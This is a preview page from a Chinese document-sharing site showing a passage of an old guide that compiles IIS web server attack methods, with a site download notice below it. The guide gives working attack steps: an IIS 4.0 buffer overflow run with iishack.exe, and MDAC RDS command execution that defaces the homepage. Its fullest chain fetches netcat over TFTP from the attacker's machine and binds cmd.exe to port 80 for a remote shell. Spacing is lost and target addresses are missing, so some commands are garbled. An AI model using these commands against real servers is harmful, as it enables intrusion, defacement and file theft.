有关iis hack的一些方法整理

有关iis hack的一些方法整理

ID:14887724

大小:41.00 KB

页数:13页

时间:2018-07-30

有关iis hack的一些方法整理_第1页
有关iis hack的一些方法整理_第2页
有关iis hack的一些方法整理_第3页
有关iis hack的一些方法整理_第4页
有关iis hack的一些方法整理_第5页
资源描述:

《有关iis hack的一些方法整理》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、有关IISHACK的一些方法整理有关IISHACK的一些方法整理BYXUNDI<安全焦点>这里整理了一些关于IISHACK的一些漏洞,供大家参考。1,介绍由于这些方法针对通过端口80来操作,所以具有一定的威胁性,因为作为WEB你这个口总要开的。如果你想一边抽烟一边查漏洞,OK,你下载一些CGI扫描器来帮助你检查,你可以尝试使用这两个:"whisker"by"rainforestpuppy"(www.wiretrip.net/rfp)."cis"by"mnemonix"(www.cerberus-info

2、sec.co.uk)另外你如果要知道目标机器运行的是啥类型的服务程序,你可以使用下面的命令:telnet80GETHEAD/HTTP/1.0就可以返回一些名字和WEB服务程序版本,如果有些服务器把WEB运行在8080,81,8000,8001口,你就TELNET相应的口上。如果你要知道运行了SSL的WEB服务程序,在WEB服务器和浏览器进行了连接的的话,我们就可以使用工具"ssleay":s_client-connect:443HEAD/HTTP/1.02,一些常用方法:

3、========IISHACK==========www.eeye.com的人员发现了一个IIS4.0的缓冲溢出可以允许用户上载程序,如netcat到目标服务器,并把cmd.exe绑定到80口。这个缓冲溢出主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序在系统中下载和执行程序。要检测这样的站点你需要两个文件iishack.exe,ncx.exe,你可以到下面的站点www.technotronic.com去下载,另外你还

4、需要一台自己的WEB服务器,当然你可以是虚拟服务器哦。你现在你自己的WEB服务器上运行WEB服务程序并把ncx.exe放到你自己相应的目录下,然后使用iishack.exe来检查目标机器:c:>iishack.exe80/ncx.exe然后你就使用netcat来连接你要检测的服务器:c:>nc80如果溢出点正确你就可以看到目标机器的命令行提示,并且是管理远权限。=========MDAC-本地命令执行===========你可能认为这个漏

5、洞太老了,可网络如此之大,可能还有好多IISWEB服务器存在这个漏洞啦。IIS的MDAC组件存在一个漏洞可以导致攻击者远程执行你系统的命令。主要核心问题是存在于RDSDatafactory,默认情况下,它允许远程命令发送到IIS服务器中,这命令会以设备用户的身份运行,其一般默认情况下是SYSTEM用户。关于这个漏洞的描述,很多文章介绍的很清楚,这里不做详细解释,你如果要对自己的站点进行检查是否存在这个漏洞,你可以通过下面的操作:c:>nc-nw-w280GET/msadc/msadcs

6、.dllHTTP如果你得到下面的信息:application/x_varg就很有可能没有打上补丁并存在此漏洞,你可以使用rainforestpuppy站上的两个程序进行测试(www.wiretrip.net/rfp)==>mdac.pl和msadc2.pl。c:>mdac.pl-hPleasetypetheNTcommandlineyouwanttorun(cmd/cassumed):cmd/cOK,如果你要替换对方的主页,你就可以使用下面的方法:cmd/cechohackedby

7、me>d:inetpubwwwrootvictimwebindex.htm或者其他命令,当然最好的方法我觉得还是使用上载我们的netcat,并把CMD.EXE绑定到端口80上,我们可以设置我们自己的TFTP服务程序并把nc.exe放上去,然后在执行命令,如:cmd/ccd%systemroot%&&tftp-iGETnc.exe&&delftptmp&&attrib-rnc.exe&&nc.exe-l-p80-t-ecmd.exe然后你就连接到80口,得到一个SHELL

8、口让你浏览。呵呵!=========Codebrws.asp&Showcode.asp==================Codebrws.asp和Showcode.asp在IIS4.0中是附带的看文件的程序,但不是默认安装的,这个查看器是如果管理员允许查看样例文件作为联系而安装的,但是,这个查看器没有很好的限制所访问的文件,远程攻击者可以利用这个漏洞来查看目标机器上的任意文件内容,但要注意以下几点:1,Codebrws.asp和Showc

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。